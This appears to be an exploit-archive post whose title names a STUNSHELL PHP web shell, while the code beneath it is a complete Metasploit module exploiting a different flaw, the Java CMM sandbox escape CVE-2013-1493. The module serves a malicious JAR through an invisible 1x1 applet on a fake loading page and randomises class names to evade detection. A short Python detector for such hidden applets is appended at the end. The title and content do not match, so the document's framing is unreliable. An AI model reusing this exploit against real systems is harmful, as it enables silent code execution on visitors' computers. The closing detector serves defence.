STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # The compiled applet classes ship with the framework under data/exploits/cve-2013-1493;
  # the entry class is renamed to a random name so the served JAR differs per run.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Requests ending in .jar get the applet archive; the resource root gets the
  # landing page; anything else is redirected to the resource root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
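A defensive check for the delivery pattern generate_html above produces: a jar-backed applet rendered at 1x1 so the visitor sees nothing. This is an added example, not part of the original post or the Metasploit module; the AppletFinder and suspicious_applets names and the sample HTML strings are constructed for illustration.

```python
from html.parser import HTMLParser


class AppletFinder(HTMLParser):
    """Collect the attributes of every <applet> tag in an HTML document."""

    def __init__(self):
        super().__init__()
        self.applets = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "applet":
            self.applets.append({k.lower(): (v or "") for k, v in attrs})


def _dimension(value):
    """Parse a width/height attribute; missing or unparsable values give None."""
    try:
        return int(value.strip().rstrip("px"))
    except (AttributeError, ValueError):
        return None


def suspicious_applets(html, max_px=1):
    """Return <applet> tags that load a .jar into a box no larger than max_px.

    A .jar applet drawn at 1x1 renders nothing for the user, which is exactly
    the shape of the tag generate_html emits; visible applets have real sizes.
    """
    parser = AppletFinder()
    parser.feed(html)
    hits = []
    for attrs in parser.applets:
        w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        tiny = w is not None and h is not None and w <= max_px and h <= max_px
        if attrs.get("archive", "").lower().endswith(".jar") and tiny:
            hits.append(attrs)
    return hits


# Constructed samples: the first mirrors the HTML generate_html above emits.
SAMPLE = ('<html><head><title>Loading, Please Wait...</title></head>'
          '<body><center><p>Loading, Please Wait...</p></center>'
          '<applet archive="abcdefgh.jar" code="Xyzw.class" width="1" height="1">'
          '</applet></body></html>')
BENIGN = ('<html><body><applet code="Viewer.class" width="640" height="480">'
          '</applet></body></html>')
```

Run it over captured landing pages or proxy responses; a hit is a reason to look at the served .jar, not proof of exploitation on its own.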